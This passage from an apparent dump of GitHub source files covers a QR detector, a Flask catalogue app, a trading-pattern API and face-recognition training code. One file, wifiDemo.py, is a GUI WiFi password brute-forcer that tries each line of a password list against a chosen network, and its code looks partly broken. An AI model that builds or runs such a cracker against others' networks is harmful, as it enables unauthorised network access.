height / 2)\n classIds.append(classId)\n confidences.append(float(confidence))\n boxes.append([left, top, int(width), int(height)])\n\n indices = cv.dnn.NMSBoxes(boxes, confidences, threshold, threshold - 0.1)\n\n for i in indices:\n i = i[0]\n box = boxes[i]\n left = box[0]\n top = box[1]\n width = box[2]\n height = box[3]\n cropped_image = frame[top:top + height, left:left + width]\n\n try:\n # cv.imshow('cropped', cropped_image)\n crop_img = str(os.path.join(crop_dir, filename))\n cv.imwrite(crop_img, cropped_image)\n except:\n pass\n\n # Draw bounding box for objects\n cv.rectangle(frame, (left, top), (left + width, top + height), (255, 0, 255), thickness)\n # Draw class name and confidence\n label = '%s:%.2f' % (classes[classIds[i]], confidences[i])\n cv.putText(frame, label, (left, top), cv.FONT_HERSHEY_SIMPLEX, 2, (255,255,255), 1)\n confidence_score.append(confidences[i])\n\n # Determine the output layer\n ln = net.getLayerNames()\n ln = [ln[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n net.setInput(blob)\n start_time = time.monotonic()\n # Compute\n outs = net.forward(ln)\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('forward in %.1fms' % (elapsed_ms))\n\n start_time = time.monotonic()\n postprocess(frame, outs)\n # print(postprocess(frame, outs))\n elapsed_ms = (time.monotonic() - start_time) * 1000\n # print('postprocess in %.1fms' % (elapsed_ms))\n\n if hScale > wScale:\n frame = cv.resize(frame, (int(imgWidth / hScale), maxHeight))\n elif hScale < wScale:\n frame = cv.resize(frame, (maxWidth, int(imgHeight / wScale)))\n\n #cv.imshow('QR Detection', frame)\n save_img = str(os.path.join(final_path, filename))\n cv.imwrite(save_img, frame)\n cv.destroyAllWindows()\n cv.waitKey(1)\n\ndef main():\n print(\"[INFO] Scanning images...\")\n analye_img()\n conf_score()\n print(\"[INFO] Finished scanning.\")\n print(\"Date and Time: {}\".format(datetime.datetime.now()))\n\n # Save resutls in excel\n df = pd.DataFrame(columns=['Image number','Confidence Score', 'Decoding Passed'])\n counter=0\n for i, j in zip(confidence_score, decode_result):\n df = df.append({'Image number' : counter, 'Confidence Score': i, 'Decoding Passed':j}, ignore_index=True)\n counter += 1\n writer = pd.ExcelWriter('taken_picture.xlsx')\n\n df.to_excel(writer, sheet_name='taken_picture', index=False)\n writer.save()\n\nif __name__ == \"__main__\":\n main()\n"
}
] | 12 |
jnoortheen/mobile_catalogue | https://github.com/jnoortheen/mobile_catalogue | 5137bba620f62ec43824714b503b6bf7c2b3f07e | e0153457d26b583633f199c4f2745f31bb948992 | 656793f5f8003de7816492c7a4aef2103f85dc37 | refs/heads/master | 2020-04-10T19:09:07.294400 | 2016-12-29T16:52:26 | 2016-12-29T16:52:26 | 68,092,635 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7575757503509521,
"alphanum_fraction": 0.7575757503509521,
"avg_line_length": 21.571428298950195,
"blob_id": "731619877951e6eb7d938aa4791c2f8a53523618",
"content_id": "22330aed543dabbe9b4cb38f9844a98cb9eb15b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 165,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 7,
"path": "/mobile_catalogue/modals/__init__.py",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "from flask_sqlalchemy import SQLAlchemy\r\n\r\ndb = SQLAlchemy()\r\n\r\nfrom ._Users import User\r\nfrom ._Category import Category\r\nfrom ._Item import MobileItem, ItemField\r\n"
},
{
"alpha_fraction": 0.6801646947860718,
"alphanum_fraction": 0.7021276354789734,
"avg_line_length": 26.019229888916016,
"blob_id": "ceac2394d251c44d291ac48448a0fd78aa2d10ac",
"content_id": "712b2ba0e650930aec211a93fe2a838fd832e012",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1457,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 52,
"path": "/mobile_catalogue/populate_data.py",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "from sqlalchemy import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom modals import Category, db, User, ItemField, MobileItem\r\n\r\nengine = create_engine('sqlite:///app.db', echo=True)\r\ndb.metadata.bind = engine\r\nDBSession = sessionmaker(bind=engine)\r\nsess = DBSession()\r\n\r\ndb.metadata.drop_all()\r\ndb.metadata.create_all(engine)\r\n\r\n# adding users\r\nuser1 = User(\"user1\", \"[email protected]\")\r\nsess.add(user1)\r\nsess.commit()\r\nuser2 = User(\"user2\", \"[email protected]\")\r\nsess.add(user2)\r\nsess.commit()\r\n\r\n# adding categories\r\nnokia = Category(\"Nokia\")\r\nsess.add(nokia)\r\nmx = Category(\"Micromax\")\r\nsess.add(mx)\r\nsony = Category(\"Sony\")\r\nsess.add(sony)\r\nkrbm = Category(\"Karbonn\")\r\nsess.add(krbm)\r\nsess.commit()\r\n\r\n# adding mobile modals\r\nitm1 = MobileItem(\"Nokia 230\", nokia, user1)\r\nsess.add(itm1)\r\nsess.commit()\r\n\r\nitm2 = MobileItem(\"Nokia 100\", nokia, user1)\r\nsess.add(itm2)\r\nsess.commit()\r\n\r\n# adding field to those items\r\nsess.add(ItemField(\"OS\", \"Android\", itm1))\r\nsess.add(ItemField(\"Colour\", \"Android\", itm1))\r\nsess.add(ItemField(\"Item model number\", \"NOKIA 230 DUAL SIM\", itm1))\r\nsess.add(ItemField(\"Special features\", \"Dual SIM, Primary Camera, Secondary Camera\", itm1))\r\nsess.commit()\r\n\r\nsess.add(ItemField(\"OS\", \"Android\", itm2))\r\nsess.add(ItemField(\"Colour\", \"Android\", itm2))\r\nsess.add(ItemField(\"Item model number\", \"NOKIA 230 DUAL SIM\", itm2))\r\nsess.add(ItemField(\"Special features\", \"Dual SIM, Primary Camera, Secondary Camera\", itm2))\r\nsess.commit()\r\n"
},
{
"alpha_fraction": 0.7075471878051758,
"alphanum_fraction": 0.7075471878051758,
"avg_line_length": 24.5,
"blob_id": "7858d403467aef186bcd185b34882b3ceec76603",
"content_id": "0ba1468d4dddf557822c42038741b28434ce4408",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 8,
"path": "/mobile_catalogue/catalog.wsgi",
"repo_name": "jnoortheen/mobile_catalogue",
"src_encoding": "UTF-8",
"text": "import sys\r\nimport os\r\n\r\n# insert the path where app module can be loaded\r\npath = os.path.join(os.path.dirname(__file__))\r\nif path not in sys.path:\r\n sys.path.append(path)\r\nfrom app import app as application\r\n"
}
] | 3 |
milanvadher/pattern_poc | https://github.com/milanvadher/pattern_poc | f5447493b9bad53e80efb600ff7116316e6ce748 | 8a35e4ade2e7d9d2bb97031d20878dde06053da0 | 99552f3421f6e9e2aedbd9abe7a8a477039738b6 | refs/heads/master | 2020-03-29T02:30:55.090587 | 2018-10-29T10:45:00 | 2018-10-29T10:45:00 | 149,440,812 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6577102541923523,
"alphanum_fraction": 0.6670560836791992,
"avg_line_length": 9.325301170349121,
"blob_id": "9dce7a23be09ab767d302fbb494cc55ebbda7f19",
"content_id": "45eeb907defd3a11757b5ef8023c5f1cdeae4992",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 856,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 83,
"path": "/README.md",
"repo_name": "milanvadher/pattern_poc",
"src_encoding": "UTF-8",
"text": "# Pattern Generation\n\n## Software Required\n\n### 1. Python 3.x.x\n\n```bash\nsudo add-apt-repository ppa:jonathonf/python-3.6\n```\n\n```bash\nsudo apt-get update\n```\n\n```bash\nsudo apt-get install python3.6\n```\n\n### 2. Pip / Pip3\n\n```bash\nsudo apt-get install python-pip python-dev build-essential\n```\n\n```bash\nsudo pip install --upgrade pip\n```\n\n## Library Required\n\n* Flask\n\n```bash\nsudo apt-get install python-flask\n```\n\n* Pymongo\n\n```bash\nsudo apt-get install python-pymongo\n```\n\n* Pandas\n\n```bash\nsudo apt-get install python-pandas\n```\n\n* Numpy\n\n```bash\nsudo apt-get install python-numpy\n```\n\n* Scipy\n\n```bash\nsudo apt-get install python-scipy\n```\n\n* Request\n\n```python\nsudo pip install request\n```\n\n* Jsonify\n\n```python\nsudo pip install jsonify\n```\n\n* flask_cors\n\n```python\nsudo pip install flask_cors\n```\n\n## Commands to Excecute\n\n```bash\npython test.py\n```"
},
{
"alpha_fraction": 0.49616339802742004,
"alphanum_fraction": 0.5069707036018372,
"avg_line_length": 28.562299728393555,
"blob_id": "4aa3bc76a5e6d4e805479b31e905e5af4ec5ae56",
"content_id": "1ddd59e098ec26e4dcf43411fef2b2b1400c0869",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9253,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 313,
"path": "/test.py",
"repo_name": "milanvadher/pattern_poc",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, jsonify\nfrom pymongo import MongoClient\nfrom bson.json_util import dumps\n# from flask_cors import CORS\nimport pandas as pd\nimport numpy as np\nfrom scipy.signal import argrelextrema\n\napp = Flask(__name__)\n# CORS(app)\nclient = MongoClient('localhost', 27017) # localDB\n\n# connect to db\ndb = client.pattern_poc\n\n# connect to collection\ntestTable = db.test\ndataTable = db.dummyData\n\n\ndef remove_duplication(seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n\n# test api\[email protected]('/test')\ndef get_apitest():\n return jsonify({'msg': 'Api is working'})\n\n\n# test db api\[email protected]('/dbtest')\ndef get_dbtest():\n return dumps(testTable.find({}))\n\n\n# upload bulk data\[email protected]('/uploadCSV', methods=['POST'])\ndef upload_csv():\n # delete all data\n dataTable.delete_many({})\n\n # Create variable for uploaded file\n df = pd.read_csv(request.files['fileupload'])\n\n # convert data to dict\n records_ = df.to_dict(orient='records')\n\n # upload data to db\n dataTable.insert_many(records_)\n\n del df\n del records_\n return jsonify({'success': 'Data uploaded successfully!!'})\n\n\n# get Forex (Uploaded data)\[email protected]('/getData')\ndef get_dummyData():\n _date = []\n _open = []\n _high = []\n _low = []\n _close = []\n _volume = []\n for data in dataTable.find({}):\n _date.append(data['Time (UTC)'])\n _open.append(data['Open'])\n _high.append(data['High'])\n _low.append(data['Low'])\n _close.append(data['Close'])\n _volume.append(data['Volume '])\n\n return jsonify(\n {\n 'date': _date\n },\n {'open': _open},\n {'high': _high},\n {'low': _low},\n {'close': _close},\n {'volume': _volume},\n )\n # return dumps(dataTable.find({}))\n\n\n# for triangle pattern optimised\ndef best_pattern(pattern):\n finalPatterns = []\n if pattern:\n # print(pattern)\n temp = []\n for last in pattern:\n temp.append(last[2][1])\n finalPatterns.append(pattern[temp.index(min(temp))])\n print(finalPatterns, '***************')\n\n\[email protected]('/getTrianglePattern')\ndef triangle_pattern():\n volume = []\n date = []\n trianglePattern = []\n firstpoint = []\n peakoint = []\n lastpoint = []\n\n for data in dataTable.find({}):\n volume.append(data['Volume '])\n date.append(data['Time (UTC)'])\n\n data = pd.DataFrame({'vol': volume})\n data = data.drop_duplicates(keep=False)\n\n data.columns = [['vol']]\n\n _volume = data['vol']\n\n # print(_volume)\n\n for i in range(0, len(_volume)):\n max_idx = list(\n argrelextrema(_volume.values[:i], np.greater, order=10)[0])\n min_idx = list(argrelextrema(_volume.values[:i], np.less, order=10)[0])\n\n idx = max_idx + min_idx + [len(_volume[:i] - 1)]\n\n idx.sort()\n\n current_idx = idx[-3:]\n\n start = min(current_idx)\n end = max(current_idx)\n\n current_pat = _volume.values[current_idx]\n\n peaks = _volume.values[idx]\n\n if (len(current_idx) == 3):\n XA = current_pat[1] - current_pat[0]\n AB = current_pat[2] - current_pat[1]\n\n if XA > 0 and AB < 0:\n # trianglePattern.append(current_pat)\n trianglePattern.append([\n [\n date[volume.index(current_pat[0])],\n volume[volume.index(current_pat[0])]\n ],\n [\n date[volume.index(current_pat[1])],\n volume[volume.index(current_pat[1])]\n ],\n [\n date[volume.index(current_pat[2])],\n volume[volume.index(current_pat[2])]\n ],\n ])\n firstpoint.append(volume[volume.index(current_pat[0])])\n peakoint.append(volume[volume.index(current_pat[1])])\n lastpoint.append(volume[volume.index(current_pat[2])])\n\n # peakoint = remove_duplication(peakoint)\n # firstpoint = remove_duplication(firstpoint)\n # lastpoint = remove_duplication(lastpoint)\n firstPattern = []\n finalPatterns = []\n first = trianglePattern[0][0][1]\n for i in range(0, len(trianglePattern)):\n if first != trianglePattern[i][0][1]:\n if firstPattern:\n # print(pattern)\n temp = []\n for last in firstPattern:\n temp.append(last[2][1])\n finalPatterns.append(firstPattern[temp.index(min(temp))])\n # print(finalPatterns, '***************')\n firstPattern = []\n first = trianglePattern[i][0][1]\n # break\n else:\n # print(i, trianglePattern[i])\n firstPattern.append(trianglePattern[i])\n\n # print(\"PeakPoints : \", len(peakoint), \" : \")\n # print(\"FirstPoints : \", len(firstpoint), \" : \")\n # print(\"LastPoints : \", len(lastpoint), \" : \")\n print(\"total triangle : \", len(finalPatterns))\n \n del volume\n del date\n del trianglePattern\n del firstpoint\n del peakoint\n del lastpoint\n del firstPattern\n\n return (jsonify({\"trianglePattern\": finalPatterns}))\n\n# @app.route('/getZigZagPattern')\n# def zigzag_pattern():\n# volume = []\n# date = []\n# zigzagPattern = []\n# firstpoint = []\n# peakoint = []\n# lastpoint = []\n\n# for data in dataTable.find({}):\n# volume.append(data['Volume '])\n# date.append(data['Time (UTC)'])\n\n# data = pd.DataFrame({'vol': volume})\n# data = data.drop_duplicates(keep=False)\n\n# data.columns = [['vol']]\n\n# _volume = data['vol']\n\n# # print(_volume)\n\n# for i in range(0, len(_volume)):\n# max_idx = list(\n# argrelextrema(_volume.values[:i], np.greater, order=10)[0])\n# min_idx = list(argrelextrema(_volume.values[:i], np.less, order=10)[0])\n\n# idx = max_idx + min_idx + [len(_volume[:i] - 1)]\n\n# idx.sort()\n\n# current_idx = idx[-6:]\n\n# start = min(current_idx)\n# end = max(current_idx)\n\n# current_pat = _volume.values[current_idx]\n\n# peaks = _volume.values[idx]\n\n# if (len(current_idx) == 6):\n# XA = current_pat[1] - current_pat[0]\n# AB = current_pat[2] - current_pat[1]\n# BC = current_pat[3] - current_pat[2]\n# CD = current_pat[4] - current_pat[3]\n# DA = current_pat[5] - current_pat[4]\n\n# if XA > 0 and AB < 0 and BC > 0 and CD < 0 and DA > 0:\n# # zigzagPattern.append(current_pat)\n# zigzagPattern.append([\n# [\n# date[volume.index(current_pat[0])],\n# volume[volume.index(current_pat[0])]\n# ],\n# [\n# date[volume.index(current_pat[1])],\n# volume[volume.index(current_pat[1])]\n# ],\n# [\n# date[volume.index(current_pat[2])],\n# volume[volume.index(current_pat[2])]\n# ],\n# [\n# date[volume.index(current_pat[3])],\n# volume[volume.index(current_pat[3])]\n# ],\n# [\n# date[volume.index(current_pat[4])],\n# volume[volume.index(current_pat[4])]\n# ],\n# [\n# date[volume.index(current_pat[5])],\n# volume[volume.index(current_pat[5])]\n# ],\n# ])\n# firstpoint.append(volume[volume.index(current_pat[0])])\n# peakoint.append(volume[volume.index(current_pat[1])])\n# lastpoint.append(volume[volume.index(current_pat[2])])\n\n# # peakoint = remove_duplication(peakoint)\n# # firstpoint = remove_duplication(firstpoint)\n# # lastpoint = remove_duplication(lastpoint)\n# firstPattern = []\n# finalPatterns = []\n# first = zigzagPattern[0][0][1]\n# for i in range(0, len(zigzagPattern)):\n# if first != zigzagPattern[i][0][1]:\n# if firstPattern:\n# # print(pattern)\n# temp = []\n# for last in firstPattern:\n# temp.append(last[2][1])\n# finalPatterns.append(firstPattern[temp.index(min(temp))])\n# # print(finalPatterns, '***************')\n# firstPattern = []\n# first = zigzagPattern[i][0][1]\n# # break\n# else:\n# # print(i, zigzagPattern[i])\n# firstPattern.append(zigzagPattern[i])\n\n# # print(\"PeakPoints : \", len(peakoint), \" : \")\n# # print(\"FirstPoints : \", len(firstpoint), \" : \")\n# # print(\"LastPoints : \", len(lastpoint), \" : \")\n# print(\"total zigzag : \", len(finalPatterns))\n\n# return (jsonify({\"zigzagPattern\": finalPatterns}))\n\n\n# run api\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5001)\n"
}
] | 2 |
JChenghao/firstGit | https://github.com/JChenghao/firstGit | 43932f7a8d84aed8c486be77fb08a219962cf6ea | 2add84e4ba053a5c758ba7a0d4ac4d7106080845 | 5068fb2b3c8080d530ef2a0a328cdfb8fc8b53e1 | refs/heads/master | 2020-05-15T21:55:36.179079 | 2019-04-24T09:40:42 | 2019-04-24T09:40:42 | 182,512,318 | 0 | 0 | null | 2019-04-21T09:06:14 | 2019-04-24T09:34:02 | 2019-04-24T09:40:43 | Python | [
{
"alpha_fraction": 0.5928381681442261,
"alphanum_fraction": 0.5981432199478149,
"avg_line_length": 21.878787994384766,
"blob_id": "8f968f85c66281a824932d6a440c4f71652526d6",
"content_id": "4dca59ab5d9f904524544088cb3c58ff6b198621",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 910,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 33,
"path": "/testWiFi.py",
"repo_name": "JChenghao/firstGit",
"src_encoding": "UTF-8",
"text": "#!/user/bin/env python3\n#-*- coding: utf-8 -*-\nimport pywifi\nfrom pywifi import const\n\ndef createCard():\n #创建一个无限网卡\n wifi = pywifi.PyWiFi()\n #获取无限网卡\n card = wifi.interfaces()[0]\n #打印无限网卡名字\n print(card.name())\n #打印连接状态\n # print(card.status())\n if card.status() == const.IFACE_DISCONNECTED:\n print(\"未连接\")\n elif card.status() == const.IFACE_CONNECTED:\n print(\"已连接\")\n#扫描\ndef scanWifi():\n wifi = pywifi.PyWiFi()\n iface = wifi.interfaces()[0]\n #扫描附近wifi\n iface.scan()\n #获取扫描之后的结果--结果是一个列表\n numWifi = iface.scan_results()\n # print(numWifi)\n for data in numWifi:\n #遍历后打印在附近扫描出来wifi的名称用ssid -----中文就会乱码\n print(data.ssid)\nif __name__ == '__main__':\n #createCard()\n scanWifi()"
},
{
"alpha_fraction": 0.5753575563430786,
"alphanum_fraction": 0.5918591618537903,
"avg_line_length": 22.316238403320312,
"blob_id": "75885fa4334559bfcccf42a23ada780aadc678fd",
"content_id": "65b79dfd13665d8029af870508d3463a1fcbe01f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3567,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 117,
"path": "/wifiDemo.py",
"repo_name": "JChenghao/firstGit",
"src_encoding": "UTF-8",
"text": "#!/user/bin/env python3\n#-*- coding: utf-8 -*-\nfrom tkinter import *\nfrom pywifi import const\nimport pywifi\nimport time\n\n\"\"\"\n1.导入模块\n2.获取第一个无线网卡\n3.断开所有的wifi\n4.读取密码本\n5.设置睡眠时间-模拟连接\n\"\"\"\n#测试连接\ndef wifiConnect(str,wifiName):\n #创建一个窗口无线对象\n wifi = pywifi.PyWiFi()\n #抓取第一个无线网卡\n ifaces = wifi.interfaces()[0]\n #断开所有wifi的连接\n ifaces.disconnect()\n #休息一秒\n time.sleep(1)\n\n #判断连接状态\n if ifaces.status() == const.IFACE_DISCONNECTED:\n #创建wifi连接文件\n proFile = pywifi.PyWiFi()\n\n \"\"\"\n 下面可以直接用\n \"\"\"\n #添加wifi的名称\n proFile.ssid = wifiName\n #添加wifi的加密算法\n # proFile.akm.append(const.AKM_TYPE_WPA2PSK)\n proFile.akm =const.AKM_TYPE_WPA2PSK\n #wifi的密码\n proFile.key = str\n #网卡的开发\n proFile.auth = const.AUTH_ALG_OPEN\n\n #删除所有的wifi文件\n ifaces.remove_all_network_profiles()\n #设定新的连接文件\n tepProFile = ifaces.add_network_profile(proFile)\n #连接\n ifaces.connect(tepProFile)\n time.sleep(4)\n\n if ifaces.status() == const.IFACE_CONNECTED:\n return True\n else:\n return False\n\n else:\n print(\"已经连接成功!\")\n\n\n\n\n#读取密码\ndef readPwd():\n #获取用户输入的wifi名称\n userInputWiFiName = entry.get()\n # print(userInputWiFiName)\n #获取密码本路径\n notePwdPath = r'F:\\PycharmSave\\firstGit\\wifi密码本.txt'\n file = open(notePwdPath,\"r\")\n while True:\n try:\n #读取密码本 一行一行的读\n myStr = file.readline()\n # print(myStr)\n #测试连接\n bool = wifiConnect(myStr,userInputWiFiName)\n if bool:\n print(\"密码正确\",myStr)\n else:\n # print(\"密码错误\",myStr)\n #在列表框中打印 END表示添加到最后\n text.insert(END,\"密码错误:\"+myStr)\n #让文本滚动 让他一直显示最后一行\n text.see(END)\n #更新一下\n text.update()\n except:\n #跳出本次循环,执行下一次循环\n continue\n\n#创建一个窗口对象\nwindow = Tk()\n#修改窗口显示的名字\nwindow.title(\"WIFI万能钥匙\")\n#调整窗口的大小以及在屏幕中显示的位置 注意:大小是用x来表示 位置坐标用+来表示 他们都是用的geometry方法,所以可以组合在一起使用\nwindow.geometry(\"500x400+400+200\")\n\n#标签控件 显示名称用text,\nlable = Label(window, text = \"输入要破解的wifi名称:\")\n#标签位置定位 grid网格式布局 pack 包 place 位置 三种定位 grid默认属性:row = 0 ,column = 0\nlable.grid(row = 0, column = 0)\n\n#输入标签 字体大小会影响输入框的高度\nentry = Entry(window, font = (\"微软雅黑\",20))\nentry.grid(row = 0, column = 1)\n\n#列表框控件 Listbox\ntext = Listbox(window, font = (\"微软雅黑\",15), width = 40,height = 10)\n#columnspan组建是所跨越的列数\ntext.grid(row = 1,columnspan = 2)\n\n#按钮控件 button 再点击按钮的时候 肯定会触发一个事件用command\nbutton = Button(window, text = \"开始破解\", width = 10, height = 2, command = readPwd)\nbutton.grid(row = 2 ,columnspan = 2)\n#显示窗口 mainloop()消息循环\nwindow.mainloop()"
}
] | 2 |
labyrinth7x/multi-task-face-recognition-framework | https://github.com/labyrinth7x/multi-task-face-recognition-framework | f7dde99beec1170397b1dfd3839c340c62796451 | 63329e7635b0a0245ce5532e52a28a773b313ae3 | 1eb76946b3738cc0db34c122019533dfe8c014c9 | refs/heads/master | 2022-11-10T21:06:55.593955 | 2020-07-01T02:48:34 | 2020-07-01T02:48:34 | 255,211,951 | 3 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6573591828346252,
"alphanum_fraction": 0.6682441830635071,
"avg_line_length": 41.2599983215332,
"blob_id": "f42617c00d26d06c89661a89de999483595169d3",
"content_id": "395ebbd641fff6d985e8589cf424d19d27753fb3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2113,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 50,
"path": "/multitask.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "from config_multi import get_config\nimport os\nfrom Learner_multi import face_learner\nfrom pathlib import Path\nimport argparse\n\n# python train.py -net mobilefacenet -b 200 -w 4\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='for face verification')\n parser.add_argument('-e', '--epochs', help='training epochs', default=20, type=int)\n parser.add_argument('-net', '--net_mode', help='which network, [ir, ir_se, mobilefacenet]',default='ir_se', type=str)\n parser.add_argument('-depth', '--net_depth', help='how many layers [50,100,152]', default=50, type=int)\n parser.add_argument('-lr','--lr',help='learning rate',default=1e-3, type=float)\n parser.add_argument('-b', '--batch_size', help='batch_size', default=100, type=int)\n parser.add_argument('-w', '--num_workers', help='workers number', default=3, type=int)\n parser.add_argument('-d', '--data_mode', help='use which database, [vgg, ms1m, emore, concat]',default='emore', type=str)\n parser.add_argument('-meta_file', type=str)\n parser.add_argument('-pseudo_folder', type=str)\n parser.add_argument('-remove_single', action='store_true')\n parser.add_argument('-resume', type=str, default=None)\n parser.add_argument('-device', type=int, default=None)\n args = parser.parse_args()\n\n conf = get_config()\n \n if args.net_mode == 'mobilefacenet':\n conf.use_mobilfacenet = True\n else:\n conf.net_mode = args.net_mode\n conf.net_depth = args.net_depth \n \n conf.lr = args.lr\n conf.batch_size = args.batch_size\n conf.num_workers = args.num_workers\n conf.data_mode = args.data_mode\n conf.pseudo_folder = args.pseudo_folder\n conf.meta_file = args.meta_file\n conf.work_path = Path(conf.meta_file.replace('labels.txt', str(args.remove_single)))\n conf.model_path = conf.work_path/'models'\n conf.log_path = conf.work_path/'log'\n conf.save_path = conf.work_path/'log'\n conf.remove_single = args.remove_single\n conf.resume = args.resume\n conf.device = args.device\n\n\n learner = face_learner(conf)\n\n learner.train(conf, args.epochs)\n"
},
{
"alpha_fraction": 0.679173469543457,
"alphanum_fraction": 0.7145187854766846,
"avg_line_length": 48.702701568603516,
"blob_id": "3728be2cc1ba9e82f2bdc85cf719470426d05afd",
"content_id": "55907cb8388601b9c3876d9c44369d3aa09a97fa",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1905,
"license_type": "no_license",
"max_line_length": 402,
"num_lines": 37,
"path": "/README.md",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "# Multi-task Face Recognition Framework\n\n## Introduction\nThis repository is a multi-task face recognition framework, built on top of the [PyTorch implementation](https://github.com/TreB1eN/InsightFace_Pytorch) of ArcFace. \nIt is for our IJCNN'20 paper [Neighborhood-Aware Attention Network for Semi-supervised Face Recognition](https://drive.google.com/file/d/1fNarQTLGRcmf06C1Uhytjcbn3U9hknf0/view?usp=sharing). \nYou may refer to the repository [NAAN](https://github.com/labyrinth7x/NAAN) for the fully semi-supervised implementation of our paper.\n\n## Requirments\n- python >= 3.5\n- pytorch >= 1.0.0\n- numpy\n- tensorboardX\n\n## Data Preparation\n- Download the full MS-Celeb-1M realeased by [ArcFace](https://github.com/deepinsight/insightface) from [baidu](https://pan.baidu.com/s/1S6LJZGdqcZRle1vlcMzHOQ) or [dropbox](https://www.dropbox.com/s/wpx6tqjf0y5mf6r/faces_ms1m-refine-v2_112x112.zip?dl=0), and move them to the folder ```faces_emore```.\n- Download the splitted image list produced by [learn-to-cluster](https://github.com/yl-1993/learn-to-cluster) from [GoogleDrive](https://drive.google.com/file/d/1kurPWh6dm3dWQOLqUAeE-fxHrdnjaULB/view?usp=sharing) or [OneDrive](https://mycuhk-my.sharepoint.com/:u:/g/personal/1155095455_link_cuhk_edu_hk/ET7lHxOXSjtDiMsgqzLK9LgBi_QW0WVzgZdv2UBzE1Bgzg?e=jZ7kCS), and move them to the folder ```lists```.\n- Re-arrange the dataset using ```preprocess.py```. The folder structure of ```emore``` is the same as:\n ```\n emore\n ├── trainset\n ├── testset\n ├── split_1\n ├── split_2\n ├── split_3\n ├── split_4\n ├── split_5\n ├── split_6\n ├── split_7\n ├── split_8\n ├── split_9\n ```\n\n## Training\n```\nsh train_multi.sh\n```\nModify the param ```path``` in ```train_multi.sh``` to the directory of the generated pseudo-label file ```split{}_labels.txt```.\n"
},
{
"alpha_fraction": 0.5971523523330688,
"alphanum_fraction": 0.6141740679740906,
"avg_line_length": 33.98127365112305,
"blob_id": "4d1cfe7dc9b570c355d1dfde3c692acd413ecf5f",
"content_id": "ad2cdee44cdbde07d4489892d78cece7137d120d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9341,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 267,
"path": "/data_pipe.py",
"repo_name": "labyrinth7x/multi-task-face-recognition-framework",
"src_encoding": "UTF-8",
"text": "from pathlib import Path\nfrom torch.utils.data import Dataset, ConcatDataset, DataLoader\nfrom torchvision import transforms as trans\nfrom torchvision.datasets import ImageFolder, DatasetFolder\nfrom PIL import Image, ImageFile\nImageFile.LOAD_TRUNCATED_IMAGES = True\nimport numpy as np\nimport torch\nimport mxnet as mx\nimport cv2\nimport bcolz\nimport pickle\nfrom tqdm import tqdm\nimport os\nimport sys\nfrom torch.utils.data import Sampler\n\ncount = [0, 584013, 1164672, 1740301, 2314488, 2890517, 3465678, 4046365, 4628523, 5206761]\n\ndef de_preprocess(tensor):\n return tensor*0.5 + 0.5\n \ndef get_train_dataset(imgs_folder):\n train_transform = trans.Compose([\n trans.RandomHorizontalFlip(),\n trans.ToTensor(),\n trans.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5])\n ])\n ds = ImageFolder(str(imgs_folder), train_transform)\n class_num = ds[-1][1] + 1\n print('loading train dataset:{} done'.format(class_num))\n return ds, class_num\n\nclass SubsetSampler(Sampler):\n r\"\"\"Samples elements from a given list of indices, without replacement.\n\n Arguments:\n indices (sequence): a sequence of indices\n \"\"\"\n\n def __init__(self, indices):\n self.indices = indices\n\n def __iter__(self):\n return (self.indices[i] for i in range(len(self.indices)))\n\n def __len__(self):\n return len(self.indices)\n\n\n\ndef get_train_loader(conf):\n if conf.data_mode in ['ms1m', 'concat']:\n ms1m_ds, ms1m_class_num = get_train_dataset(conf.ms1m_folder+'/imgs')\n print('ms1m loader generated')\n if conf.data_mode in ['vgg', 'concat']:\n vgg_ds, vgg_class_num = get_train_dataset(conf.vgg_folder+'/imgs')\n print('vgg loader generated') \n if conf.data_mode == 'vgg':\n ds = vgg_ds\n class_num = vgg_class_num\n elif conf.data_mode == 'ms1m':\n ds = ms1m_ds\n class_num = ms1m_class_num\n elif conf.data_mode == 'concat':\n for i,(url,label) in enumerate(vgg_ds.imgs):\n vgg_ds.imgs[i] = (url, label + ms1m_class_num)\n ds = ConcatDataset([ms1m_ds,vgg_ds])\n class_num = vgg_class_num + ms1m_class_num\n elif conf.data_mode == 'emore':\n ds, class_num = get_train_dataset(conf.emore_folder)\n loader = DataLoader(ds, batch_size=conf.batch_size, shuffle=True, 